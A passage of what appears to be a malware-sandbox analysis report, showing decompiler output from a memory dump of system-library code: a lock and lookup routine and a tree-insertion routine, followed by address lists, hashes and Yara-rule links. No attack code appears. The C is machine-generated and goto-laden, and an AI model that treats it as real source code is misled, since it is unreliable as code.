				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0xb78714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E00AB2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E00AB2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E00A858EC(_t240);
									_t221 =  *0xb75cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0xb75cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E00AC4A2C(0xb76e40, 0xac4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E00AA7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0xa65c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E00ABF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E00ABF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E00B07016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L00AA2400(_t267 + 0x20);
															}
															L00AA2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E00AB2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E00AA2280(_t134, 0xb78608);
									__eflags =  *0xb76e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E00A9FFB0(_t198, _t241, 0xb78608);
										__eflags = _t253;
										if(_t253 != 0) {
											L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0xb76e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0xb78608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E00AB6B90(_t210,  &_v64);
										_t262 =  *0xb78608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E00ABE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E00AC97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E00AC006A(0xb78608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0xb78608);
												E00ACB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0xb76904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0xb76e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E00A9FFB0(_t198, _t240, 0xb78608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E00AC00C2(0xb78608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                                                                    0x00ab20a0
                                                                                                    0x00ab20a8
                                                                                                    0x00ab20ad
                                                                                                    0x00ab20b3
                                                                                                    0x00ab20b8
                                                                                                    0x00ab20c2
                                                                                                    0x00ab20c7
                                                                                                    0x00ab20cb
                                                                                                    0x00ab20d2
                                                                                                    0x00ab2263
                                                                                                    0x00ab2266
                                                                                                    0x00af5836
                                                                                                    0x00af5836
                                                                                                    0x00000000
                                                                                                    0x00ab226c
                                                                                                    0x00ab226c
                                                                                                    0x00ab2270
                                                                                                    0x00ab2274
                                                                                                    0x00ab20e2
                                                                                                    0x00ab20e2
                                                                                                    0x00ab20e6
                                                                                                    0x00ab20ee
                                                                                                    0x00af57dc
                                                                                                    0x00af57de
                                                                                                    0x00af57ec
                                                                                                    0x00af57ec
                                                                                                    0x00af57f1
                                                                                                    0x00af57f3
                                                                                                    0x00af57f8
                                                                                                    0x00000000
                                                                                                    0x00af57f8
                                                                                                    0x00af57e0
                                                                                                    0x00af57e4
                                                                                                    0x00af57ea
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af57ea
                                                                                                    0x00ab20f4
                                                                                                    0x00ab20f4
                                                                                                    0x00ab20f8
                                                                                                    0x00ab20f8
                                                                                                    0x00ab20fc
                                                                                                    0x00ab2100
                                                                                                    0x00ab2106
                                                                                                    0x00ab2201
                                                                                                    0x00ab2206
                                                                                                    0x00ab220b
                                                                                                    0x00ab220e
                                                                                                    0x00ab22a9
                                                                                                    0x00ab22ac
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab22b2
                                                                                                    0x00ab22b5
                                                                                                    0x00af5801
                                                                                                    0x00af5806
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af5810
                                                                                                    0x00af5815
                                                                                                    0x00af5818
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af581e
                                                                                                    0x00ab22bb
                                                                                                    0x00ab22bb
                                                                                                    0x00ab2218
                                                                                                    0x00ab2218
                                                                                                    0x00ab221c
                                                                                                    0x00ab2220
                                                                                                    0x00ab2222
                                                                                                    0x00ab22c2
                                                                                                    0x00ab22c4
                                                                                                    0x00ab22dc
                                                                                                    0x00ab22dc
                                                                                                    0x00ab22e1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab22e7
                                                                                                    0x00ab22c8
                                                                                                    0x00ab22cd
                                                                                                    0x00ab22d3
                                                                                                    0x00ab22d6
                                                                                                    0x00af5823
                                                                                                    0x00af5825
                                                                                                    0x00af5827
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af582d
                                                                                                    0x00000000
                                                                                                    0x00af582d
                                                                                                    0x00000000
                                                                                                    0x00ab2228
                                                                                                    0x00ab2228
                                                                                                    0x00000000
                                                                                                    0x00ab2228
                                                                                                    0x00ab2222
                                                                                                    0x00ab2214
                                                                                                    0x00ab2214
                                                                                                    0x00000000
                                                                                                    0x00ab2114
                                                                                                    0x00ab2114
                                                                                                    0x00ab2114
                                                                                                    0x00ab211a
                                                                                                    0x00ab211c
                                                                                                    0x00ab2348
                                                                                                    0x00ab234d
                                                                                                    0x00af5840
                                                                                                    0x00af5845
                                                                                                    0x00af5848
                                                                                                    0x00af584e
                                                                                                    0x00af584e
                                                                                                    0x00af5848
                                                                                                    0x00ab2353
                                                                                                    0x00ab2355
                                                                                                    0x00ab2388
                                                                                                    0x00ab2388
                                                                                                    0x00ab2368
                                                                                                    0x00ab236a
                                                                                                    0x00ab236c
                                                                                                    0x00ab238f
                                                                                                    0x00000000
                                                                                                    0x00ab236e
                                                                                                    0x00ab236e
                                                                                                    0x00ab218e
                                                                                                    0x00ab218e
                                                                                                    0x00ab2191
                                                                                                    0x00ab2195
                                                                                                    0x00af5a03
                                                                                                    0x00af5a06
                                                                                                    0x00af5a0c
                                                                                                    0x00af5a0f
                                                                                                    0x00af5a11
                                                                                                    0x00af5a13
                                                                                                    0x00af5a13
                                                                                                    0x00af5a19
                                                                                                    0x00af5a1f
                                                                                                    0x00000000
                                                                                                    0x00ab219b
                                                                                                    0x00ab219b
                                                                                                    0x00ab21a0
                                                                                                    0x00ab2282
                                                                                                    0x00ab2284
                                                                                                    0x00ab2284
                                                                                                    0x00ab2284
                                                                                                    0x00ab2284
                                                                                                    0x00ab21a6
                                                                                                    0x00ab21a9
                                                                                                    0x00ab21ac
                                                                                                    0x00ab21ae
                                                                                                    0x00ab21b3
                                                                                                    0x00ab228b
                                                                                                    0x00ab2290
                                                                                                    0x00ab2379
                                                                                                    0x00ab2296
                                                                                                    0x00ab2298
                                                                                                    0x00ab2298
                                                                                                    0x00ab2290
                                                                                                    0x00ab21b9
                                                                                                    0x00ab21be
                                                                                                    0x00ab22a2
                                                                                                    0x00ab22a2
                                                                                                    0x00ab21c4
                                                                                                    0x00ab21c8
                                                                                                    0x00ab21cc
                                                                                                    0x00ab21d0
                                                                                                    0x00ab21d4
                                                                                                    0x00ab21de
                                                                                                    0x00ab21e3
                                                                                                    0x00af5a29
                                                                                                    0x00af5a2c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af5a3b
                                                                                                    0x00000000
                                                                                                    0x00ab21e9
                                                                                                    0x00ab21e9
                                                                                                    0x00ab21e9
                                                                                                    0x00ab21ee
                                                                                                    0x00ab21f1
                                                                                                    0x00af5a45
                                                                                                    0x00af5a4b
                                                                                                    0x00af5a52
                                                                                                    0x00af5a58
                                                                                                    0x00af5a5d
                                                                                                    0x00af5a5f
                                                                                                    0x00af5a71
                                                                                                    0x00af5a61
                                                                                                    0x00af5a6a
                                                                                                    0x00af5a6a
                                                                                                    0x00af5a76
                                                                                                    0x00af5a79
                                                                                                    0x00af5a7f
                                                                                                    0x00af5a83
                                                                                                    0x00af5a85
                                                                                                    0x00af5a87
                                                                                                    0x00af5a87
                                                                                                    0x00af5a8c
                                                                                                    0x00af5a91
                                                                                                    0x00af5a97
                                                                                                    0x00af5a9f
                                                                                                    0x00af5aa0
                                                                                                    0x00af5aa1
                                                                                                    0x00af5aa6
                                                                                                    0x00af5aab
                                                                                                    0x00af5ab1
                                                                                                    0x00af5ab3
                                                                                                    0x00af5ab9
                                                                                                    0x00af5aca
                                                                                                    0x00af5ad4
                                                                                                    0x00af5ad4
                                                                                                    0x00af5ade
                                                                                                    0x00af5ade
                                                                                                    0x00af5aab
                                                                                                    0x00af5a79
                                                                                                    0x00af5a52
                                                                                                    0x00ab21f7
                                                                                                    0x00ab21f9
                                                                                                    0x00ab21fe
                                                                                                    0x00ab21fe
                                                                                                    0x00ab21e3
                                                                                                    0x00ab2195
                                                                                                    0x00ab236c
                                                                                                    0x00ab2122
                                                                                                    0x00ab2122
                                                                                                    0x00ab2124
                                                                                                    0x00ab2231
                                                                                                    0x00ab2236
                                                                                                    0x00ab2236
                                                                                                    0x00ab2238
                                                                                                    0x00ab2238
                                                                                                    0x00ab2240
                                                                                                    0x00ab2242
                                                                                                    0x00ab2244
                                                                                                    0x00af59fc
                                                                                                    0x00ab218c
                                                                                                    0x00ab218c
                                                                                                    0x00000000
                                                                                                    0x00ab218c
                                                                                                    0x00ab224a
                                                                                                    0x00ab224f
                                                                                                    0x00ab2256
                                                                                                    0x00ab2304
                                                                                                    0x00ab2309
                                                                                                    0x00ab230f
                                                                                                    0x00ab231e
                                                                                                    0x00ab231e
                                                                                                    0x00ab231e
                                                                                                    0x00ab2320
                                                                                                    0x00ab2325
                                                                                                    0x00ab232a
                                                                                                    0x00ab232c
                                                                                                    0x00ab233e
                                                                                                    0x00ab233e
                                                                                                    0x00000000
                                                                                                    0x00ab232c
                                                                                                    0x00ab2311
                                                                                                    0x00ab2317
                                                                                                    0x00ab231a
                                                                                                    0x00ab231c
                                                                                                    0x00ab2380
                                                                                                    0x00ab2380
                                                                                                    0x00ab2380
                                                                                                    0x00ab2384
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab2386
                                                                                                    0x00000000
                                                                                                    0x00ab231c
                                                                                                    0x00ab225c
                                                                                                    0x00ab225c
                                                                                                    0x00000000
                                                                                                    0x00ab225c
                                                                                                    0x00ab212a
                                                                                                    0x00ab2134
                                                                                                    0x00ab2138
                                                                                                    0x00ab213d
                                                                                                    0x00af5858
                                                                                                    0x00af5863
                                                                                                    0x00af5863
                                                                                                    0x00af5867
                                                                                                    0x00af586a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af586c
                                                                                                    0x00af586c
                                                                                                    0x00af5871
                                                                                                    0x00af5875
                                                                                                    0x00af5877
                                                                                                    0x00af5997
                                                                                                    0x00af599c
                                                                                                    0x00af59a1
                                                                                                    0x00af59a7
                                                                                                    0x00af59a7
                                                                                                    0x00000000
                                                                                                    0x00af59a7
                                                                                                    0x00af587d
                                                                                                    0x00000000
                                                                                                    0x00af588b
                                                                                                    0x00af588b
                                                                                                    0x00af5890
                                                                                                    0x00af5892
                                                                                                    0x00af5894
                                                                                                    0x00af5899
                                                                                                    0x00af589b
                                                                                                    0x00af58a0
                                                                                                    0x00af58a0
                                                                                                    0x00af58aa
                                                                                                    0x00af58b2
                                                                                                    0x00af58b6
                                                                                                    0x00af58be
                                                                                                    0x00af58c6
                                                                                                    0x00af58c9
                                                                                                    0x00af590d
                                                                                                    0x00af5917
                                                                                                    0x00af591a
                                                                                                    0x00af591c
                                                                                                    0x00af5920
                                                                                                    0x00af5928
                                                                                                    0x00af592a
                                                                                                    0x00af592c
                                                                                                    0x00af592e
                                                                                                    0x00af592e
                                                                                                    0x00af58cb
                                                                                                    0x00af58cd
                                                                                                    0x00af58d8
                                                                                                    0x00af58e0
                                                                                                    0x00af58f4
                                                                                                    0x00af58fe
                                                                                                    0x00af58fe
                                                                                                    0x00af593a
                                                                                                    0x00af593e
                                                                                                    0x00af5940
                                                                                                    0x00af5942
                                                                                                    0x00000000
                                                                                                    0x00af5944
                                                                                                    0x00af5944
                                                                                                    0x00af5949
                                                                                                    0x00af594e
                                                                                                    0x00af594e
                                                                                                    0x00af5953
                                                                                                    0x00af595b
                                                                                                    0x00af5976
                                                                                                    0x00af5976
                                                                                                    0x00af597a
                                                                                                    0x00af597f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af5981
                                                                                                    0x00af5981
                                                                                                    0x00af5981
                                                                                                    0x00af5983
                                                                                                    0x00af5988
                                                                                                    0x00af598d
                                                                                                    0x00af5991
                                                                                                    0x00af5991
                                                                                                    0x00000000
                                                                                                    0x00af595d
                                                                                                    0x00af595d
                                                                                                    0x00af5963
                                                                                                    0x00af5965
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af5967
                                                                                                    0x00af5967
                                                                                                    0x00af596b
                                                                                                    0x00af596d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af596f
                                                                                                    0x00af5971
                                                                                                    0x00af5971
                                                                                                    0x00af5974
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af5974
                                                                                                    0x00000000
                                                                                                    0x00af5967
                                                                                                    0x00af595b
                                                                                                    0x00af5942
                                                                                                    0x00af5863
                                                                                                    0x00ab2143
                                                                                                    0x00ab2143
                                                                                                    0x00ab2149
                                                                                                    0x00ab214f
                                                                                                    0x00ab22f1
                                                                                                    0x00ab22f6
                                                                                                    0x00000000
                                                                                                    0x00ab2173
                                                                                                    0x00ab2173
                                                                                                    0x00ab217d
                                                                                                    0x00ab2181
                                                                                                    0x00ab2186
                                                                                                    0x00af59ae
                                                                                                    0x00af59b2
                                                                                                    0x00af59b5
                                                                                                    0x00af59b7
                                                                                                    0x00af59ba
                                                                                                    0x00af59cd
                                                                                                    0x00af59d1
                                                                                                    0x00af59d5
                                                                                                    0x00af59d9
                                                                                                    0x00af59db
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af59dd
                                                                                                    0x00af59dd
                                                                                                    0x00af59e1
                                                                                                    0x00af59e4
                                                                                                    0x00af59e7
                                                                                                    0x00af59ee
                                                                                                    0x00af59ee
                                                                                                    0x00af59f3
                                                                                                    0x00af59f3
                                                                                                    0x00000000
                                                                                                    0x00ab2186
                                                                                                    0x00ab214f
                                                                                                    0x00ab2106
                                                                                                    0x00ab2266
                                                                                                    0x00ab20d8
                                                                                                    0x00ab20da
                                                                                                    0x00ab20e0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e6d55205ed0fdd212e2d29558065f967a7401001ee152e0cce4aff150cbb642d
                                                                                                    • Instruction ID: dca24707005a0b7d902a8b6c9d17914ff25450f868d7207c8cfd59a636744960
                                                                                                    • Opcode Fuzzy Hash: e6d55205ed0fdd212e2d29558065f967a7401001ee152e0cce4aff150cbb642d
                                                                                                    • Instruction Fuzzy Hash: F0F13831A087419FD725CF68C8447AA7BE9AF85350F14862EFA99CB392D734DC41CB82
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00A9B090, Relevance: .4, Instructions: 405COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 99%
                                                                                                    			E00A9B090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
